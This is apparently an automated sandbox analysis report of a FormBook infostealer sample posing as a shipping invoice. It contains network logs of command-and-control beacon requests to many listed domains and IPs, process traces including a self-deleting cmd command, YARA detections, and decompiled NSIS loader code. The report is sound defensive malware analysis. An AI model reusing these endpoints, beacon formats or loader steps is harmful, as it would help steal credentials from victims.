                                                                                                                                  Nov 26, 2020 15:09:11.054827929 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:11.522761106 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:11.589823961 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.298913956 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.299211025 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.315665007 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315711975 CET8049772165.227.229.15192.168.2.4
                                                                                                                                  Nov 26, 2020 15:09:13.315924883 CET4977280192.168.2.4165.227.229.15
                                                                                                                                  Nov 26, 2020 15:09:13.316107035 CET4977280192.168.2.4165.227.229.15

UDP Packets


DNS Queries


DNS Answers

                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com96.126.123.244A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.56.79.23A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.79.19.196A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.carnesveymacr.com
                                                                                                                                  • www.mehler.photography
                                                                                                                                  • www.thelonerangernews.com
                                                                                                                                  • www.hvcharging.com
                                                                                                                                  • www.jddq888.com
                                                                                                                                  • www.wtmailer15.com
                                                                                                                                  • www.wastie.club
                                                                                                                                  • www.gettingthehelloutofca.com
                                                                                                                                  • www.caelaabadie.com

                                                                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49764 | 192.0.78.24 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:23.752765894 CET | 1403 | OUT | GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.carnesveymacr.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:23.769018888 CET | 1403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49765 | 192.0.78.24 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:28.844275951 CET | 1404 | OUT | GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1
                                                                                                                                  Host: www.mehler.photography
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:28.860582113 CET | 1405 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:39.024245024 CET | 1406 | OUT | GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1
                                                                                                                                  Host: www.thelonerangernews.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:39.139292955 CET | 1406 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fbfb454-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49767 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:44.356384993 CET | 1409 | OUT | GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.hvcharging.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:44.471837997 CET | 1409 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:44 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49768 | 23.88.85.105 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:49.702579021 CET | 1410 | OUT | GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1
                                                                                                                                  Host: www.jddq888.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:49.871308088 CET | 1410 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:46 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 57
                                                                                                                                  Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                                                                  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49769 | 75.126.100.11 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:55.111057997 CET | 1411 | OUT | GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.wtmailer15.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:08:55.246997118 CET | 1412 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49770 | 95.215.210.10 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:09:00.427666903 CET | 1413 | OUT | GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1
                                                                                                                                  Host: www.wastie.club
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:09:00.543806076 CET | 1414 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:00 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                                                                                  Content-Length: 203
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49771 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:09:05.652915001 CET | 1415 | OUT | GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.gettingthehelloutofca.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
Nov 26, 2020 15:09:05.767719984 CET | 1415 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:05 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49772
Destination IP: 165.227.229.15
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 15:09:11.027050972 CET
kBytes transferred: 1417
Direction: OUT
Data:
GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1
Host: www.caelaabadie.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 26, 2020 15:09:13.298913956 CET
kBytes transferred: 1417
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:11 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: http://caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8

Timestamp: Nov 26, 2020 15:09:13.315665007 CET
kBytes transferred: 1417
Direction: IN
Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Code Manipulations

Statistics

[Charts not captured: CPU Usage; Memory Usage; High Level Behavior Distribution; Behavior]

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:15:07:08
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:438107 bytes
                                                                                                                                  MD5 hash:579BA39B6A146080EF6481591440E445
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:15:07:09
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe Prehnite,Lychnises
                                                                                                                                  Imagebase:0xd30000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:07:16
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:07:30
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:07:44
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:82944 bytes
                                                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:07:48
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:/c del 'C:\Windows\SysWOW64\cmd.exe'
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:07:49
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis


                                                                                                                                    Executed Functions

                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			_entry_() {
                                                                                                                                    				signed int _t42;
                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                    				CHAR* _t51;
                                                                                                                                    				char* _t53;
                                                                                                                                    				CHAR* _t55;
                                                                                                                                    				void* _t59;
                                                                                                                                    				intOrPtr _t61;
                                                                                                                                    				int _t62;
                                                                                                                                    				int _t65;
                                                                                                                                    				signed int _t66;
                                                                                                                                    				int _t67;
                                                                                                                                    				signed int _t69;
                                                                                                                                    				void* _t93;
                                                                                                                                    				signed int _t109;
                                                                                                                                    				void* _t112;
                                                                                                                                    				void* _t117;
                                                                                                                                    				intOrPtr* _t118;
                                                                                                                                    				char _t121;
                                                                                                                                    				signed int _t140;
                                                                                                                                    				signed int _t141;
                                                                                                                                    				int _t149;
                                                                                                                                    				void* _t150;
                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                    				CHAR* _t155;
                                                                                                                                    				CHAR* _t156;
                                                                                                                                    				void* _t158;
                                                                                                                                    				char* _t159;
                                                                                                                                    				void* _t162;
                                                                                                                                    				void* _t163;
                                                                                                                                    				intOrPtr _t188;
                                                                                                                                    
                                                                                                                                    				 *(_t163 + 0x18) = 0;
                                                                                                                                    				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                    				 *(_t163 + 0x20) = 0;
                                                                                                                                    				 *(_t163 + 0x14) = 0x20;
                                                                                                                                    				SetErrorMode(0x8001); // executed
                                                                                                                                    				_t42 = GetVersion() & 0xbfffffff;
                                                                                                                                    				 *0x42f42c = _t42;
                                                                                                                                    				if(_t42 != 6) {
                                                                                                                                    					_t118 = E004064FE(0);
                                                                                                                                    					if(_t118 != 0) {
                                                                                                                                    						 *_t118(0xc00);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_t155 = "UXTHEME";
                                                                                                                                    				do {
                                                                                                                                    					E00406490(_t155); // executed
                                                                                                                                    					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
                                                                                                                                    				} while ( *_t155 != 0);
                                                                                                                                    				E004064FE(0xa);
                                                                                                                                    				 *0x42f424 = E004064FE(8);
                                                                                                                                    				_t47 = E004064FE(6);
                                                                                                                                    				if(_t47 != 0) {
                                                                                                                                    					_t47 =  *_t47(0x1e);
                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                    						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				__imp__#17(_t158);
                                                                                                                                    				__imp__OleInitialize(0); // executed
                                                                                                                                    				 *0x42f4f8 = _t47;
                                                                                                                                    				SHGetFileInfoA(0x429858, 0, _t163 + 0x38, 0x160, 0); // executed
                                                                                                                                    				E00406166("Unbound Setup", "NSIS Error");
                                                                                                                                    				_t51 = GetCommandLineA();
                                                                                                                                    				_t159 = "\"C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe\" ";
                                                                                                                                    				E00406166(_t159, _t51);
                                                                                                                                    				 *0x42f420 = 0x400000;
                                                                                                                                    				_t53 = _t159;
                                                                                                                                    				if("\"C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe\" " == 0x22) {
                                                                                                                                    					 *(_t163 + 0x14) = 0x22;
                                                                                                                                    					_t53 =  &M00435001;
                                                                                                                                    				}
                                                                                                                                    				_t55 = CharNextA(E00405B29(_t53,  *(_t163 + 0x14)));
                                                                                                                                    				 *(_t163 + 0x1c) = _t55;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t121 =  *_t55;
                                                                                                                                    					_t171 = _t121;
                                                                                                                                    					if(_t121 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t121 - 0x20;
                                                                                                                                    					if(_t121 != 0x20) {
                                                                                                                                    						L13:
                                                                                                                                    						__eflags =  *_t55 - 0x22;
                                                                                                                                    						 *(_t163 + 0x14) = 0x20;
                                                                                                                                    						if( *_t55 == 0x22) {
                                                                                                                                    							_t55 =  &(_t55[1]);
                                                                                                                                    							__eflags = _t55;
                                                                                                                                    							 *(_t163 + 0x14) = 0x22;
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *_t55 - 0x2f;
                                                                                                                                    						if( *_t55 != 0x2f) {
                                                                                                                                    							L25:
                                                                                                                                    							_t55 = E00405B29(_t55,  *(_t163 + 0x14));
                                                                                                                                    							__eflags =  *_t55 - 0x22;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								_t55 =  &(_t55[1]);
                                                                                                                                    								__eflags = _t55;
                                                                                                                                    							}
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							_t55 =  &(_t55[1]);
                                                                                                                                    							__eflags =  *_t55 - 0x53;
                                                                                                                                    							if( *_t55 != 0x53) {
                                                                                                                                    								L20:
                                                                                                                                    								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                                                                    								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                                                                    									L24:
                                                                                                                                    									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                                                                    									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                                                                    										 *((char*)(_t55 - 2)) = 0;
                                                                                                                                    										__eflags =  &(_t55[2]);
                                                                                                                                    										E00406166(0x435400,  &(_t55[2]));
                                                                                                                                    										L30:
                                                                                                                                    										_t156 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                                                                    										GetTempPathA(0x400, _t156); // executed
                                                                                                                                    										_t59 = E00403378(_t171);
                                                                                                                                    										_t172 = _t59;
                                                                                                                                    										if(_t59 != 0) {
                                                                                                                                    											L33:
                                                                                                                                    											DeleteFileA("1033"); // executed
                                                                                                                                    											_t61 = E00402E14(_t174,  *(_t163 + 0x20)); // executed
                                                                                                                                    											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
                                                                                                                                    											if(_t61 != 0) {
                                                                                                                                    												L43:
                                                                                                                                    												ExitProcess(); // executed
                                                                                                                                    												__imp__OleUninitialize(); // executed
                                                                                                                                    												_t184 =  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                                    												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
                                                                                                                                    													__eflags =  *0x42f4d4;
                                                                                                                                    													if( *0x42f4d4 == 0) {
                                                                                                                                    														L67:
                                                                                                                                    														_t62 =  *0x42f4ec;
                                                                                                                                    														__eflags = _t62 - 0xffffffff;
                                                                                                                                    														if(_t62 != 0xffffffff) {
                                                                                                                                    															 *(_t163 + 0x14) = _t62;
                                                                                                                                    														}
                                                                                                                                    														ExitProcess( *(_t163 + 0x14));
                                                                                                                                    													}
                                                                                                                                    													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
                                                                                                                                    													__eflags = _t65;
                                                                                                                                    													_t149 = 2;
                                                                                                                                    													if(_t65 != 0) {
                                                                                                                                    														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
                                                                                                                                    														 *(_t163 + 0x38) = 1;
                                                                                                                                    														 *(_t163 + 0x44) = _t149;
                                                                                                                                    														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
                                                                                                                                    													}
                                                                                                                                    													_t66 = E004064FE(4);
                                                                                                                                    													__eflags = _t66;
                                                                                                                                    													if(_t66 == 0) {
                                                                                                                                    														L65:
                                                                                                                                    														_t67 = ExitWindowsEx(_t149, 0x80040002);
                                                                                                                                    														__eflags = _t67;
                                                                                                                                    														if(_t67 != 0) {
                                                                                                                                    															goto L67;
                                                                                                                                    														}
                                                                                                                                    														goto L66;
                                                                                                                                    													} else {
                                                                                                                                    														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
                                                                                                                                    														__eflags = _t69;
                                                                                                                                    														if(_t69 == 0) {
                                                                                                                                    															L66:
                                                                                                                                    															E0040140B(9);
                                                                                                                                    															goto L67;
                                                                                                                                    														}
                                                                                                                                    														goto L65;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    												E00405882( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
                                                                                                                                    												ExitProcess(2);
                                                                                                                                    											}
